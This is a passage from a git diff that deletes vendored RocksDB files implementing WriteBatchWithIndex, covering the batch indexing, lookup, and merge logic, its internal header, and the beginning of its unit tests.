-  iter.Seek(key);
-  if (!iter.Valid()) {
-    return false;
-  }
-  if (comparator.CompareKey(column_family_id, key, iter.Entry().key) != 0) {
-    return false;
-  }
-  WriteBatchIndexEntry* non_const_entry =
-      const_cast<WriteBatchIndexEntry*>(iter.GetRawEntry());
-  non_const_entry->offset = last_entry_offset;
-  return true;
-}
-
-void WriteBatchWithIndex::Rep::AddOrUpdateIndex(
-    ColumnFamilyHandle* column_family, const Slice& key) {
-  if (!UpdateExistingEntry(column_family, key)) {
-    uint32_t cf_id = GetColumnFamilyID(column_family);
-    const auto* cf_cmp = GetColumnFamilyUserComparator(column_family);
-    if (cf_cmp != nullptr) {
-      comparator.SetComparatorForCF(cf_id, cf_cmp);
-    }
-    AddNewEntry(cf_id);
-  }
-}
-
-void WriteBatchWithIndex::Rep::AddOrUpdateIndex(const Slice& key) {
-  if (!UpdateExistingEntryWithCfId(0, key)) {
-    AddNewEntry(0);
-  }
-}
-
-void WriteBatchWithIndex::Rep::AddNewEntry(uint32_t column_family_id) {
-  const std::string& wb_data = write_batch.Data();
-  Slice entry_ptr = Slice(wb_data.data() + last_entry_offset,
-                          wb_data.size() - last_entry_offset);
-  // Extract key
-  Slice key;
-  bool success __attribute__((__unused__)) =
-      ReadKeyFromWriteBatchEntry(&entry_ptr, &key, column_family_id != 0);
-  assert(success);
-
-    auto* mem = arena.Allocate(sizeof(WriteBatchIndexEntry));
-    auto* index_entry =
-        new (mem) WriteBatchIndexEntry(last_entry_offset, column_family_id,
-                                       key.data() - wb_data.data(), key.size());
-    skip_list.Insert(index_entry);
-  }
-
-  void WriteBatchWithIndex::Rep::Clear() {
-    write_batch.Clear();
-    ClearIndex();
-  }
-
-  void WriteBatchWithIndex::Rep::ClearIndex() {
-    skip_list.~WriteBatchEntrySkipList();
-    arena.~Arena();
-    new (&arena) Arena();
-    new (&skip_list) WriteBatchEntrySkipList(comparator, &arena);
-    last_entry_offset = 0;
-  }
-
-  Status WriteBatchWithIndex::Rep::ReBuildIndex() {
-    Status s;
-
-    ClearIndex();
-
-    if (write_batch.Count() == 0) {
-      // Nothing to re-index
-      return s;
-    }
-
-    size_t offset = WriteBatchInternal::GetFirstOffset(&write_batch);
-
-    Slice input(write_batch.Data());
-    input.remove_prefix(offset);
-
-    // Loop through all entries in Rep and add each one to the index
-    int found = 0;
-    while (s.ok() && !input.empty()) {
-      Slice key, value, blob, xid;
-      uint32_t column_family_id = 0;  // default
-      char tag = 0;
-
-      // set offset of current entry for call to AddNewEntry()
-      last_entry_offset = input.data() - write_batch.Data().data();
-
-      s = ReadRecordFromWriteBatch(&input, &tag, &column_family_id, &key,
-                                   &value, &blob, &xid);
-      if (!s.ok()) {
-        break;
-      }
-
-      switch (tag) {
-        case kTypeColumnFamilyValue:
-        case kTypeValue:
-        case kTypeColumnFamilyDeletion:
-        case kTypeDeletion:
-        case kTypeColumnFamilySingleDeletion:
-        case kTypeSingleDeletion:
-        case kTypeColumnFamilyMerge:
-        case kTypeMerge:
-          found++;
-          if (!UpdateExistingEntryWithCfId(column_family_id, key)) {
-            AddNewEntry(column_family_id);
-          }
-          break;
-        case kTypeLogData:
-        case kTypeBeginPrepareXID:
-        case kTypeEndPrepareXID:
-        case kTypeCommitXID:
-        case kTypeRollbackXID:
-        case kTypeNoop:
-          break;
-        default:
-          return Status::Corruption("unknown WriteBatch tag");
-      }
-    }
-
-    if (s.ok() && found != write_batch.Count()) {
-      s = Status::Corruption("WriteBatch has wrong count");
-    }
-
-    return s;
-  }
-
-  WriteBatchWithIndex::WriteBatchWithIndex(
-      const Comparator* default_index_comparator, size_t reserved_bytes,
-      bool overwrite_key, size_t max_bytes)
-      : rep(new Rep(default_index_comparator, reserved_bytes, max_bytes,
-                    overwrite_key)) {}
-
-  WriteBatchWithIndex::~WriteBatchWithIndex() {}
-
-  WriteBatch* WriteBatchWithIndex::GetWriteBatch() { return &rep->write_batch; }
-
-  WBWIIterator* WriteBatchWithIndex::NewIterator() {
-    return new WBWIIteratorImpl(0, &(rep->skip_list), &rep->write_batch);
-}
-
-WBWIIterator* WriteBatchWithIndex::NewIterator(
-    ColumnFamilyHandle* column_family) {
-  return new WBWIIteratorImpl(GetColumnFamilyID(column_family),
-                              &(rep->skip_list), &rep->write_batch);
-}
-
-Iterator* WriteBatchWithIndex::NewIteratorWithBase(
-    ColumnFamilyHandle* column_family, Iterator* base_iterator) {
-  if (rep->overwrite_key == false) {
-    assert(false);
-    return nullptr;
-  }
-  return new BaseDeltaIterator(base_iterator, NewIterator(column_family),
-                               GetColumnFamilyUserComparator(column_family));
-}
-
-Iterator* WriteBatchWithIndex::NewIteratorWithBase(Iterator* base_iterator) {
-  if (rep->overwrite_key == false) {
-    assert(false);
-    return nullptr;
-  }
-  // default column family's comparator
-  return new BaseDeltaIterator(base_iterator, NewIterator(),
-                               rep->comparator.default_comparator());
-}
-
-Status WriteBatchWithIndex::Put(ColumnFamilyHandle* column_family,
-                                const Slice& key, const Slice& value) {
-  rep->SetLastEntryOffset();
-  auto s = rep->write_batch.Put(column_family, key, value);
-  if (s.ok()) {
-    rep->AddOrUpdateIndex(column_family, key);
-  }
-  return s;
-}
-
-Status WriteBatchWithIndex::Put(const Slice& key, const Slice& value) {
-  rep->SetLastEntryOffset();
-  auto s = rep->write_batch.Put(key, value);
-  if (s.ok()) {
-    rep->AddOrUpdateIndex(key);
-  }
-  return s;
-}
-
-Status WriteBatchWithIndex::Delete(ColumnFamilyHandle* column_family,
-                                   const Slice& key) {
-  rep->SetLastEntryOffset();
-  auto s = rep->write_batch.Delete(column_family, key);
-  if (s.ok()) {
-    rep->AddOrUpdateIndex(column_family, key);
-  }
-  return s;
-}
-
-Status WriteBatchWithIndex::Delete(const Slice& key) {
-  rep->SetLastEntryOffset();
-  auto s = rep->write_batch.Delete(key);
-  if (s.ok()) {
-    rep->AddOrUpdateIndex(key);
-  }
-  return s;
-}
-
-Status WriteBatchWithIndex::SingleDelete(ColumnFamilyHandle* column_family,
-                                         const Slice& key) {
-  rep->SetLastEntryOffset();
-  auto s = rep->write_batch.SingleDelete(column_family, key);
-  if (s.ok()) {
-    rep->AddOrUpdateIndex(column_family, key);
-  }
-  return s;
-}
-
-Status WriteBatchWithIndex::SingleDelete(const Slice& key) {
-  rep->SetLastEntryOffset();
-  auto s = rep->write_batch.SingleDelete(key);
-  if (s.ok()) {
-    rep->AddOrUpdateIndex(key);
-  }
-  return s;
-}
-
-Status WriteBatchWithIndex::DeleteRange(ColumnFamilyHandle* column_family,
-                                        const Slice& begin_key,
-                                        const Slice& end_key) {
-  rep->SetLastEntryOffset();
-  auto s = rep->write_batch.DeleteRange(column_family, begin_key, end_key);
-  if (s.ok()) {
-    rep->AddOrUpdateIndex(column_family, begin_key);
-  }
-  return s;
-}
-
-Status WriteBatchWithIndex::DeleteRange(const Slice& begin_key,
-                                        const Slice& end_key) {
-  rep->SetLastEntryOffset();
-  auto s = rep->write_batch.DeleteRange(begin_key, end_key);
-  if (s.ok()) {
-    rep->AddOrUpdateIndex(begin_key);
-  }
-  return s;
-}
-
-Status WriteBatchWithIndex::Merge(ColumnFamilyHandle* column_family,
-                                  const Slice& key, const Slice& value) {
-  rep->SetLastEntryOffset();
-  auto s = rep->write_batch.Merge(column_family, key, value);
-  if (s.ok()) {
-    rep->AddOrUpdateIndex(column_family, key);
-  }
-  return s;
-}
-
-Status WriteBatchWithIndex::Merge(const Slice& key, const Slice& value) {
-  rep->SetLastEntryOffset();
-  auto s = rep->write_batch.Merge(key, value);
-  if (s.ok()) {
-    rep->AddOrUpdateIndex(key);
-  }
-  return s;
-}
-
-Status WriteBatchWithIndex::PutLogData(const Slice& blob) {
-  return rep->write_batch.PutLogData(blob);
-}
-
-void WriteBatchWithIndex::Clear() { rep->Clear(); }
-
-Status WriteBatchWithIndex::GetFromBatch(ColumnFamilyHandle* column_family,
-                                         const DBOptions& options,
-                                         const Slice& key, std::string* value) {
-  Status s;
-  MergeContext merge_context;
-  const ImmutableDBOptions immuable_db_options(options);
-
-  WriteBatchWithIndexInternal::Result result =
-      WriteBatchWithIndexInternal::GetFromBatch(
-          immuable_db_options, this, column_family, key, &merge_context,
-          &rep->comparator, value, rep->overwrite_key, &s);
-
-  switch (result) {
-    case WriteBatchWithIndexInternal::Result::kFound:
-    case WriteBatchWithIndexInternal::Result::kError:
-      // use returned status
-      break;
-    case WriteBatchWithIndexInternal::Result::kDeleted:
-    case WriteBatchWithIndexInternal::Result::kNotFound:
-      s = Status::NotFound();
-      break;
-    case WriteBatchWithIndexInternal::Result::kMergeInProgress:
-      s = Status::MergeInProgress();
-      break;
-    default:
-      assert(false);
-  }
-
-  return s;
-}
-
-Status WriteBatchWithIndex::GetFromBatchAndDB(DB* db,
-                                              const ReadOptions& read_options,
-                                              const Slice& key,
-                                              std::string* value) {
-  assert(value != nullptr);
-  PinnableSlice pinnable_val(value);
-  assert(!pinnable_val.IsPinned());
-  auto s = GetFromBatchAndDB(db, read_options, db->DefaultColumnFamily(), key,
-                             &pinnable_val);
-  if (s.ok() && pinnable_val.IsPinned()) {
-    value->assign(pinnable_val.data(), pinnable_val.size());
-  }  // else value is already assigned
-  return s;
-}
-
-Status WriteBatchWithIndex::GetFromBatchAndDB(DB* db,
-                                              const ReadOptions& read_options,
-                                              const Slice& key,
-                                              PinnableSlice* pinnable_val) {
-  return GetFromBatchAndDB(db, read_options, db->DefaultColumnFamily(), key,
-                           pinnable_val);
-}
-
-Status WriteBatchWithIndex::GetFromBatchAndDB(DB* db,
-                                              const ReadOptions& read_options,
-                                              ColumnFamilyHandle* column_family,
-                                              const Slice& key,
-                                              std::string* value) {
-  assert(value != nullptr);
-  PinnableSlice pinnable_val(value);
-  assert(!pinnable_val.IsPinned());
-  auto s =
-      GetFromBatchAndDB(db, read_options, column_family, key, &pinnable_val);
-  if (s.ok() && pinnable_val.IsPinned()) {
-    value->assign(pinnable_val.data(), pinnable_val.size());
-  }  // else value is already assigned
-  return s;
-}
-
-Status WriteBatchWithIndex::GetFromBatchAndDB(DB* db,
-                                              const ReadOptions& read_options,
-                                              ColumnFamilyHandle* column_family,
-                                              const Slice& key,
-                                              PinnableSlice* pinnable_val) {
-  Status s;
-  MergeContext merge_context;
-  const ImmutableDBOptions& immuable_db_options =
-      reinterpret_cast<DBImpl*>(db)->immutable_db_options();
-
-  // Since the lifetime of the WriteBatch is the same as that of the transaction
-  // we cannot pin it as otherwise the returned value will not be available
-  // after the transaction finishes.
-  std::string& batch_value = *pinnable_val->GetSelf();
-  WriteBatchWithIndexInternal::Result result =
-      WriteBatchWithIndexInternal::GetFromBatch(
-          immuable_db_options, this, column_family, key, &merge_context,
-          &rep->comparator, &batch_value, rep->overwrite_key, &s);
-
-  if (result == WriteBatchWithIndexInternal::Result::kFound) {
-    pinnable_val->PinSelf();
-    return s;
-  }
-  if (result == WriteBatchWithIndexInternal::Result::kDeleted) {
-    return Status::NotFound();
-  }
-  if (result == WriteBatchWithIndexInternal::Result::kError) {
-    return s;
-  }
-  if (result == WriteBatchWithIndexInternal::Result::kMergeInProgress &&
-      rep->overwrite_key == true) {
-    // Since we've overwritten keys, we do not know what other operations are
-    // in this batch for this key, so we cannot do a Merge to compute the
-    // result.  Instead, we will simply return MergeInProgress.
-    return Status::MergeInProgress();
-  }
-
-  assert(result == WriteBatchWithIndexInternal::Result::kMergeInProgress ||
-         result == WriteBatchWithIndexInternal::Result::kNotFound);
-
-  // Did not find key in batch OR could not resolve Merges.  Try DB.
-  s = db->Get(read_options, column_family, key, pinnable_val);
-
-  if (s.ok() || s.IsNotFound()) {  // DB Get Succeeded
-    if (result == WriteBatchWithIndexInternal::Result::kMergeInProgress) {
-      // Merge result from DB with merges in Batch
-      auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-      const MergeOperator* merge_operator =
-          cfh->cfd()->ioptions()->merge_operator;
-      Statistics* statistics = immuable_db_options.statistics.get();
-      Env* env = immuable_db_options.env;
-      Logger* logger = immuable_db_options.info_log.get();
-
-      Slice* merge_data;
-      if (s.ok()) {
-        merge_data = pinnable_val;
-      } else {  // Key not present in db (s.IsNotFound())
-        merge_data = nullptr;
-      }
-
-      if (merge_operator) {
-        s = MergeHelper::TimedFullMerge(
-            merge_operator, key, merge_data, merge_context.GetOperands(),
-            pinnable_val->GetSelf(), logger, statistics, env);
-        pinnable_val->PinSelf();
-      } else {
-        s = Status::InvalidArgument("Options::merge_operator must be set");
-      }
-    }
-  }
-
-  return s;
-}
-
-void WriteBatchWithIndex::SetSavePoint() { rep->write_batch.SetSavePoint(); }
-
-Status WriteBatchWithIndex::RollbackToSavePoint() {
-  Status s = rep->write_batch.RollbackToSavePoint();
-
-  if (s.ok()) {
-    s = rep->ReBuildIndex();
-  }
-
-  return s;
-}
-
-Status WriteBatchWithIndex::PopSavePoint() {
-  return rep->write_batch.PopSavePoint();
-}
-
-void WriteBatchWithIndex::SetMaxBytes(size_t max_bytes) {
-  rep->write_batch.SetMaxBytes(max_bytes);
-}
-
-}  // namespace rocksdb
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/write_batch_with_index/write_batch_with_index_internal.cc b/thirdparty/rocksdb/utilities/write_batch_with_index/write_batch_with_index_internal.cc
deleted file mode 100644
index 385d16f..0000000
--- a/thirdparty/rocksdb/utilities/write_batch_with_index/write_batch_with_index_internal.cc
+++ /dev/null
@@ -1,269 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "utilities/write_batch_with_index/write_batch_with_index_internal.h"
-
-#include "db/column_family.h"
-#include "db/merge_context.h"
-#include "db/merge_helper.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/db.h"
-#include "rocksdb/utilities/write_batch_with_index.h"
-#include "util/coding.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-class Env;
-class Logger;
-class Statistics;
-
-Status ReadableWriteBatch::GetEntryFromDataOffset(size_t data_offset,
-                                                  WriteType* type, Slice* Key,
-                                                  Slice* value, Slice* blob,
-                                                  Slice* xid) const {
-  if (type == nullptr || Key == nullptr || value == nullptr ||
-      blob == nullptr || xid == nullptr) {
-    return Status::InvalidArgument("Output parameters cannot be null");
-  }
-
-  if (data_offset == GetDataSize()) {
-    // reached end of batch.
-    return Status::NotFound();
-  }
-
-  if (data_offset > GetDataSize()) {
-    return Status::InvalidArgument("data offset exceed write batch size");
-  }
-  Slice input = Slice(rep_.data() + data_offset, rep_.size() - data_offset);
-  char tag;
-  uint32_t column_family;
-  Status s = ReadRecordFromWriteBatch(&input, &tag, &column_family, Key, value,
-                                      blob, xid);
-
-  switch (tag) {
-    case kTypeColumnFamilyValue:
-    case kTypeValue:
-      *type = kPutRecord;
-      break;
-    case kTypeColumnFamilyDeletion:
-    case kTypeDeletion:
-      *type = kDeleteRecord;
-      break;
-    case kTypeColumnFamilySingleDeletion:
-    case kTypeSingleDeletion:
-      *type = kSingleDeleteRecord;
-      break;
-    case kTypeColumnFamilyRangeDeletion:
-    case kTypeRangeDeletion:
-      *type = kDeleteRangeRecord;
-      break;
-    case kTypeColumnFamilyMerge:
-    case kTypeMerge:
-      *type = kMergeRecord;
-      break;
-    case kTypeLogData:
-      *type = kLogDataRecord;
-      break;
-    case kTypeBeginPrepareXID:
-    case kTypeEndPrepareXID:
-    case kTypeCommitXID:
-    case kTypeRollbackXID:
-      *type = kXIDRecord;
-      break;
-    default:
-      return Status::Corruption("unknown WriteBatch tag");
-  }
-  return Status::OK();
-}
-
-int WriteBatchEntryComparator::operator()(
-    const WriteBatchIndexEntry* entry1,
-    const WriteBatchIndexEntry* entry2) const {
-  if (entry1->column_family > entry2->column_family) {
-    return 1;
-  } else if (entry1->column_family < entry2->column_family) {
-    return -1;
-  }
-
-  if (entry1->offset == WriteBatchIndexEntry::kFlagMin) {
-    return -1;
-  } else if (entry2->offset == WriteBatchIndexEntry::kFlagMin) {
-    return 1;
-  }
-
-  Slice key1, key2;
-  if (entry1->search_key == nullptr) {
-    key1 = Slice(write_batch_->Data().data() + entry1->key_offset,
-                 entry1->key_size);
-  } else {
-    key1 = *(entry1->search_key);
-  }
-  if (entry2->search_key == nullptr) {
-    key2 = Slice(write_batch_->Data().data() + entry2->key_offset,
-                 entry2->key_size);
-  } else {
-    key2 = *(entry2->search_key);
-  }
-
-  int cmp = CompareKey(entry1->column_family, key1, key2);
-  if (cmp != 0) {
-    return cmp;
-  } else if (entry1->offset > entry2->offset) {
-    return 1;
-  } else if (entry1->offset < entry2->offset) {
-    return -1;
-  }
-  return 0;
-}
-
-int WriteBatchEntryComparator::CompareKey(uint32_t column_family,
-                                          const Slice& key1,
-                                          const Slice& key2) const {
-  if (column_family < cf_comparators_.size() &&
-      cf_comparators_[column_family] != nullptr) {
-    return cf_comparators_[column_family]->Compare(key1, key2);
-  } else {
-    return default_comparator_->Compare(key1, key2);
-  }
-}
-
-WriteBatchWithIndexInternal::Result WriteBatchWithIndexInternal::GetFromBatch(
-    const ImmutableDBOptions& immuable_db_options, WriteBatchWithIndex* batch,
-    ColumnFamilyHandle* column_family, const Slice& key,
-    MergeContext* merge_context, WriteBatchEntryComparator* cmp,
-    std::string* value, bool overwrite_key, Status* s) {
-  uint32_t cf_id = GetColumnFamilyID(column_family);
-  *s = Status::OK();
-  WriteBatchWithIndexInternal::Result result =
-      WriteBatchWithIndexInternal::Result::kNotFound;
-
-  std::unique_ptr<WBWIIterator> iter =
-      std::unique_ptr<WBWIIterator>(batch->NewIterator(column_family));
-
-  // We want to iterate in the reverse order that the writes were added to the
-  // batch.  Since we don't have a reverse iterator, we must seek past the end.
-  // TODO(agiardullo): consider adding support for reverse iteration
-  iter->Seek(key);
-  while (iter->Valid()) {
-    const WriteEntry entry = iter->Entry();
-    if (cmp->CompareKey(cf_id, entry.key, key) != 0) {
-      break;
-    }
-
-    iter->Next();
-  }
-
-  if (!(*s).ok()) {
-    return WriteBatchWithIndexInternal::Result::kError;
-  }
-
-  if (!iter->Valid()) {
-    // Read past end of results.  Reposition on last result.
-    iter->SeekToLast();
-  } else {
-    iter->Prev();
-  }
-
-  Slice entry_value;
-  while (iter->Valid()) {
-    const WriteEntry entry = iter->Entry();
-    if (cmp->CompareKey(cf_id, entry.key, key) != 0) {
-      // Unexpected error or we've reached a different next key
-      break;
-    }
-
-    switch (entry.type) {
-      case kPutRecord: {
-        result = WriteBatchWithIndexInternal::Result::kFound;
-        entry_value = entry.value;
-        break;
-      }
-      case kMergeRecord: {
-        result = WriteBatchWithIndexInternal::Result::kMergeInProgress;
-        merge_context->PushOperand(entry.value);
-        break;
-      }
-      case kDeleteRecord:
-      case kSingleDeleteRecord: {
-        result = WriteBatchWithIndexInternal::Result::kDeleted;
-        break;
-      }
-      case kLogDataRecord:
-      case kXIDRecord: {
-        // ignore
-        break;
-      }
-      default: {
-        result = WriteBatchWithIndexInternal::Result::kError;
-        (*s) = Status::Corruption("Unexpected entry in WriteBatchWithIndex:",
-                                  ToString(entry.type));
-        break;
-      }
-    }
-    if (result == WriteBatchWithIndexInternal::Result::kFound ||
-        result == WriteBatchWithIndexInternal::Result::kDeleted ||
-        result == WriteBatchWithIndexInternal::Result::kError) {
-      // We can stop iterating once we find a PUT or DELETE
-      break;
-    }
-    if (result == WriteBatchWithIndexInternal::Result::kMergeInProgress &&
-        overwrite_key == true) {
-      // Since we've overwritten keys, we do not know what other operations are
-      // in this batch for this key, so we cannot do a Merge to compute the
-      // result.  Instead, we will simply return MergeInProgress.
-      break;
-    }
-
-    iter->Prev();
-  }
-
-  if ((*s).ok()) {
-    if (result == WriteBatchWithIndexInternal::Result::kFound ||
-        result == WriteBatchWithIndexInternal::Result::kDeleted) {
-      // Found a Put or Delete.  Merge if necessary.
-      if (merge_context->GetNumOperands() > 0) {
-        const MergeOperator* merge_operator;
-
-        if (column_family != nullptr) {
-          auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-          merge_operator = cfh->cfd()->ioptions()->merge_operator;
-        } else {
-          *s = Status::InvalidArgument("Must provide a column_family");
-          result = WriteBatchWithIndexInternal::Result::kError;
-          return result;
-        }
-        Statistics* statistics = immuable_db_options.statistics.get();
-        Env* env = immuable_db_options.env;
-        Logger* logger = immuable_db_options.info_log.get();
-
-        if (merge_operator) {
-          *s = MergeHelper::TimedFullMerge(merge_operator, key, &entry_value,
-                                           merge_context->GetOperands(), value,
-                                           logger, statistics, env);
-        } else {
-          *s = Status::InvalidArgument("Options::merge_operator must be set");
-        }
-        if ((*s).ok()) {
-          result = WriteBatchWithIndexInternal::Result::kFound;
-        } else {
-          result = WriteBatchWithIndexInternal::Result::kError;
-        }
-      } else {  // nothing to merge
-        if (result == WriteBatchWithIndexInternal::Result::kFound) {  // PUT
-          value->assign(entry_value.data(), entry_value.size());
-        }
-      }
-    }
-  }
-
-  return result;
-}
-
-}  // namespace rocksdb
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/write_batch_with_index/write_batch_with_index_internal.h b/thirdparty/rocksdb/utilities/write_batch_with_index/write_batch_with_index_internal.h
deleted file mode 100644
index ac20f1b..0000000
--- a/thirdparty/rocksdb/utilities/write_batch_with_index/write_batch_with_index_internal.h
+++ /dev/null
@@ -1,114 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <limits>
-#include <string>
-#include <vector>
-
-#include "options/db_options.h"
-#include "port/port.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/status.h"
-#include "rocksdb/utilities/write_batch_with_index.h"
-
-namespace rocksdb {
-
-class MergeContext;
-struct Options;
-
-// Key used by skip list, as the binary searchable index of WriteBatchWithIndex.
-struct WriteBatchIndexEntry {
-  WriteBatchIndexEntry(size_t o, uint32_t c, size_t ko, size_t ksz)
-      : offset(o),
-        column_family(c),
-        key_offset(ko),
-        key_size(ksz),
-        search_key(nullptr) {}
-  WriteBatchIndexEntry(const Slice* sk, uint32_t c)
-      : offset(0),
-        column_family(c),
-        key_offset(0),
-        key_size(0),
-        search_key(sk) {}
-
-  // If this flag appears in the offset, it indicates a key that is smaller
-  // than any other entry for the same column family
-  static const size_t kFlagMin = port::kMaxSizet;
-
-  size_t offset;           // offset of an entry in write batch's string buffer.
-  uint32_t column_family;  // column family of the entry.
-  size_t key_offset;       // offset of the key in write batch's string buffer.
-  size_t key_size;         // size of the key.
-
-  const Slice* search_key;  // if not null, instead of reading keys from
-                            // write batch, use it to compare. This is used
-                            // for lookup key.
-};
-
-class ReadableWriteBatch : public WriteBatch {
- public:
-  explicit ReadableWriteBatch(size_t reserved_bytes = 0, size_t max_bytes = 0)
-      : WriteBatch(reserved_bytes, max_bytes) {}
-  // Retrieve some information from a write entry in the write batch, given
-  // the start offset of the write entry.
-  Status GetEntryFromDataOffset(size_t data_offset, WriteType* type, Slice* Key,
-                                Slice* value, Slice* blob, Slice* xid) const;
-};
-
-class WriteBatchEntryComparator {
- public:
-  WriteBatchEntryComparator(const Comparator* _default_comparator,
-                            const ReadableWriteBatch* write_batch)
-      : default_comparator_(_default_comparator), write_batch_(write_batch) {}
-  // Compare a and b. Return a negative value if a is less than b, 0 if they
-  // are equal, and a positive value if a is greater than b
-  int operator()(const WriteBatchIndexEntry* entry1,
-                 const WriteBatchIndexEntry* entry2) const;
-
-  int CompareKey(uint32_t column_family, const Slice& key1,
-                 const Slice& key2) const;
-
-  void SetComparatorForCF(uint32_t column_family_id,
-                          const Comparator* comparator) {
-    if (column_family_id >= cf_comparators_.size()) {
-      cf_comparators_.resize(column_family_id + 1, nullptr);
-    }
-    cf_comparators_[column_family_id] = comparator;
-  }
-
-  const Comparator* default_comparator() { return default_comparator_; }
-
- private:
-  const Comparator* default_comparator_;
-  std::vector<const Comparator*> cf_comparators_;
-  const ReadableWriteBatch* write_batch_;
-};
-
-class WriteBatchWithIndexInternal {
- public:
-  enum Result { kFound, kDeleted, kNotFound, kMergeInProgress, kError };
-
-  // If batch contains a value for key, store it in *value and return kFound.
-  // If batch contains a deletion for key, return Deleted.
-  // If batch contains Merge operations as the most recent entry for a key,
-  //   and the merge process does not stop (not reaching a value or delete),
-  //   prepend the current merge operands to *operands,
-  //   and return kMergeInProgress
-  // If batch does not contain this key, return kNotFound
-  // Else, return kError on error with error Status stored in *s.
-  static WriteBatchWithIndexInternal::Result GetFromBatch(
-      const ImmutableDBOptions& ioptions, WriteBatchWithIndex* batch,
-      ColumnFamilyHandle* column_family, const Slice& key,
-      MergeContext* merge_context, WriteBatchEntryComparator* cmp,
-      std::string* value, bool overwrite_key, Status* s);
-};
-
-}  // namespace rocksdb
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/write_batch_with_index/write_batch_with_index_test.cc b/thirdparty/rocksdb/utilities/write_batch_with_index/write_batch_with_index_test.cc
deleted file mode 100644
index 5b1250a..0000000
--- a/thirdparty/rocksdb/utilities/write_batch_with_index/write_batch_with_index_test.cc
+++ /dev/null
@@ -1,1805 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef ROCKSDB_LITE
-
-#include <memory>
-#include <map>
-#include "db/column_family.h"
-#include "port/stack_trace.h"
-#include "rocksdb/utilities/write_batch_with_index.h"
-#include "util/random.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "utilities/merge_operators.h"
-#include "utilities/merge_operators/string_append/stringappend.h"
-
-namespace rocksdb {
-
-namespace {
-class ColumnFamilyHandleImplDummy : public ColumnFamilyHandleImpl {
- public:
-  explicit ColumnFamilyHandleImplDummy(int id, const Comparator* comparator)
-      : ColumnFamilyHandleImpl(nullptr, nullptr, nullptr),
-        id_(id),
-        comparator_(comparator) {}
-  uint32_t GetID() const override { return id_; }
-  const Comparator* GetComparator() const override { return comparator_; }
-
- private:
-  uint32_t id_;
-  const Comparator* comparator_;
-};
-
-struct Entry {
-  std::string key;
-  std::string value;
-  WriteType type;
-};
-
-struct TestHandler : public WriteBatch::Handler {
-  std::map<uint32_t, std::vector<Entry>> seen;
-  virtual Status PutCF(uint32_t column_family_id, const Slice& key,
-                       const Slice& value) {
-    Entry e;
-    e.key = key.ToString();
-    e.value = value.ToString();
-    e.type = kPutRecord;
-    seen[column_family_id].push_back(e);
-    return Status::OK();
-  }
-  virtual Status MergeCF(uint32_t column_family_id, const Slice& key,
-                         const Slice& value) {
-    Entry e;
-    e.key = key.ToString();
-    e.value = value.ToString();
-    e.type = kMergeRecord;
-    seen[column_family_id].push_back(e);
-    return Status::OK();
-  }
-  virtual void LogData(const Slice& blob) {}
-  virtual Status DeleteCF(uint32_t column_family_id, const Slice& key) {
-    Entry e;
-    e.key = key.ToString();
-    e.value = "";
-    e.type = kDeleteRecord;
-    seen[column_family_id].push_back(e);
-    return Status::OK();
-  }
-};
-}  // namespace anonymous
-
-class WriteBatchWithIndexTest : public testing::Test {};
-
-void TestValueAsSecondaryIndexHelper(std::vector<Entry> entries,
-                                     WriteBatchWithIndex* batch) {
-  // In this test, we insert <key, value> to column family `data`, and
-  // <value, key> to column family `index`. Then iterator them in order
-  // and seek them by key.
-
-  // Sort entries by key
-  std::map<std::string, std::vector<Entry*>> data_map;
-  // Sort entries by value
-  std::map<std::string, std::vector<Entry*>> index_map;
-  for (auto& e : entries) {
-    data_map[e.key].push_back(&e);
-    index_map[e.value].push_back(&e);
-  }
-
-  ColumnFamilyHandleImplDummy data(6, BytewiseComparator());
-  ColumnFamilyHandleImplDummy index(8, BytewiseComparator());
-  for (auto& e : entries) {
-    if (e.type == kPutRecord) {
-      batch->Put(&data, e.key, e.value);
-      batch->Put(&index, e.value, e.key);
-    } else if (e.type == kMergeRecord) {
-      batch->Merge(&data, e.key, e.value);
-      batch->Put(&index, e.value, e.key);
-    } else {
-      assert(e.type == kDeleteRecord);
-      std::unique_ptr<WBWIIterator> iter(batch->NewIterator(&data));
-      iter->Seek(e.key);
-      ASSERT_OK(iter->status());
-      auto write_entry = iter->Entry();
-      ASSERT_EQ(e.key, write_entry.key.ToString());
-      ASSERT_EQ(e.value, write_entry.value.ToString());
-      batch->Delete(&data, e.key);
-      batch->Put(&index, e.value, "");
-    }
-  }
-
-  // Iterator all keys
-  {
-    std::unique_ptr<WBWIIterator> iter(batch->NewIterator(&data));
-    for (int seek_to_first : {0, 1}) {
-      if (seek_to_first) {
-        iter->SeekToFirst();
-      } else {
-        iter->Seek("");
-      }
-      for (auto pair : data_map) {
-        for (auto v : pair.second) {
-          ASSERT_OK(iter->status());
-          ASSERT_TRUE(iter->Valid());
-          auto write_entry = iter->Entry();
-          ASSERT_EQ(pair.first, write_entry.key.ToString());
-          ASSERT_EQ(v->type, write_entry.type);
-          if (write_entry.type != kDeleteRecord) {
-            ASSERT_EQ(v->value, write_entry.value.ToString());
-          }
-          iter->Next();
-        }
-      }
-      ASSERT_TRUE(!iter->Valid());
-    }
-    iter->SeekToLast();
